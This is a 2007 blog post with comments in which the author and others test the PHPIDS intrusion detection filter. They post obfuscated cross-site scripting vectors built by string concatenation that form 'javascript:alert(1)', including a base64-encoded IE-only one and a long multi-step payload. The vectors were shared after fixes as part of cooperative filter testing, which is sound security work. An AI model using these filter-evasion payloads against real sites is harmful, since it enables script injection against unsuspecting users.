I’ve been testing the PHPIDS after Sirdarckcat tempted me with his post
At first I created 2 simple vectors to make injection more difficult, then I spent a couple of hours coming up with a full tag and Javascript injection. I shall post the vector here once they have fixed it because it is quite dangerous and I don’t want their site open to attack. So if you think you are a good hacker, try and inject some javascript on their Smoke test, it isn’t as easy as it first looks.
The Spanner
A tool for designers dealing with programmers dealing with designers…




Comments 21
I’ve found another serious one. I’ll share when it’s fixed. Here’s the other one I did which has now been fixed:-
s1=0?”:’i';s2=0?”:’fr’;s3=0?”:’ame’;i1=s1+s2+s3;s1=0?”:’jav’;s2=
Posted 04 Sep 2007 at 12:30 pm ¶0?”:’ascr’;s3=0?”:’ipt’;s4=0?”:’:';s5=0?”:’ale’;s6=0?”:’rt’;s7=
0?”:’(1)’;i2=s1+s2+s3+s4+s5+s6+s7;i=createElement(i1);i.src=i2;x=pa
rentNode;x.appendChild(i);
Hi!
Great work again - thx a lot! It led me to refactor the converter unit of the PHPIDS and I think I have found a pretty stable beta of the regex to check and de-assemble concatenations.
I am very looking forward for the 0.4.0 release we are currently working on - the help of you guys is what helps improving it eminently.
Greetz,
Posted 04 Sep 2007 at 2:57 pm ¶.mario
This is also fixed now:-
Posted 04 Sep 2007 at 2:58 pm ¶s1=”+’java’+”+’scr’+”;s2=”+’ipt’+':’+'ale’+”;s3=”+’rt’+”+’(1)’+”;
u1=s1+s2+s3;URL=u1
Good work Mario/PHPIDS team, I really admire all your efforts on this because I know how difficult it is to protect against this stuff.
I’ll look forward to hacking it again though
Posted 04 Sep 2007 at 3:01 pm ¶always appreciated!
Posted 04 Sep 2007 at 3:46 pm ¶It almost looks like ASCII art, good job!
Posted 04 Sep 2007 at 11:28 pm ¶Hehe thanks
I might try again soon cause I love a interesting challenge
Posted 05 Sep 2007 at 12:28 am ¶Found another one (IE only):-
Posted 05 Sep 2007 at 4:50 am ¶I’ve had to base64 encode it because it causes conversation errors:-
czE9IScnJiYnamF2JztzMj0hJycmJidhc2NyaXB0JztzMz0hJycmJic6JztzND0hJycmJidhbGVy
JztzNT0hJycmJid0JztzNj0hJycmJicoMSknO3M3PXMxK3MyK3MzK3M0K3M1K3M2O1VSTD1zNzs=
and another:-
Posted 06 Sep 2007 at 9:04 am ¶s1=”+”jav”+”;s2=”+”ascri”+”;s3=”+”pt”+”;s4=”==”?’:':0;s5=”+”aler”+”;s6=”+”t”+”;s7=”==”?’(1)’:0;s8=s1+s2+s3+s4+s5+s6+s7;URL=s8
Check this one out, creates javascript: and passes it to the URL property, only works in IE though.
Here’s my favorite:-
Yeah I think this will be an endless armsrace
btw do you know the Javascript functions:
import() and export() ? It’s pretty cool cause you can export singed script data if import is called inside a signed script. I didn’t know this, there is a lot more to be learned in Javascript.
Posted 08 Sep 2007 at 10:45 pm ¶Nope didn’t know that but sounds cool, I’m gonna google it.
Posted 09 Sep 2007 at 9:03 am ¶Definitely an arms race, I just can’t see how they can prevent all of it because we can always come up with new ways of doing things.
Still I’m impressed with their filters it isn’t that easy to come up with new vectors and I’ve done loads of complicated ones which don’t get through.
Posted 09 Sep 2007 at 6:42 pm ¶I meant:
import function() or var
export function() or var
Like:
function a() {
//foo
}
export a;
misleading stuff I know
Posted 09 Sep 2007 at 9:05 pm ¶Found any docs on that? I would be interested to read, I tried Mozilla but there’s not much stuff on it.
Posted 09 Sep 2007 at 9:42 pm ¶It is here:
http://devedge-temp.mozilla.org/library/manuals/2000/javascript/1.3/guide/sec.html
Be amazed what the ‘ol netscape can learn us, it’s almost forbidden knowledge. I read the whole book over the weekend, learned tons of new and old stuff.

Posted 10 Sep 2007 at 1:50 am ¶This one’s awesome
Posted 11 Sep 2007 at 10:09 am ¶_=alert,1,1,_(1);
This one took ages cause it’s really tough now with their new filters:-
s=function test2() {return ‘hrefjavascriptalert(1)a’;1,1}();
Posted 18 Sep 2007 at 1:34 am ¶void(a = {} );
void(c = URL );
a.c=function xyz() {return c[4] }();
a.h1=function xyz() {return s[0] }();
a.h2=function xyz() {return s[1] }();
a.h3=function xyz() {return s[2] }();
a.h4=function xyz() {return s[3] }();
a.u1=function xyz() {return s[4] }();
a.u2=function xyz() {return s[5] }();
a.u3=function xyz() {return s[6] }();
a.u4=function xyz() {return s[7] }();
a.u5=function xyz() {return s[8] }();
a.u6=function xyz() {return s[9] }();
a.u7=function xyz() {return s[10] }();
a.u8=function xyz() {return s[11] }();
a.u9=function xyz() {return s[12] }();
a.u10=function xyz() {return s[13] }();
a.u11=function xyz() {return s[14] }();
a.u12=function xyz() {return s[15] }();
a.u13=function xyz() {return s[16] }();
a.u14=function xyz() {return s[17] }();
a.u15=function xyz() {return s[18] }();
a.u16=function xyz() {return s[19] }();
a.u17=function xyz() {return s[20] }();
a.u18=function xyz() {return s[21] }();
$_=function xyz() {return a.u1 + a.u2 + a.u3 + a.u4 + a.u5 + a.u6 + a.u7 + a.u8 + a.u9 + a.u10 + a.c + a.u11 + a.u12 + a.u13 + a.u14 + a.u15 + a.u16 + a.u17 + a.u18 }();
for(i in x=this) x[a.h1+a.h2+a.h3+a.h4]=$_;
Post a Comment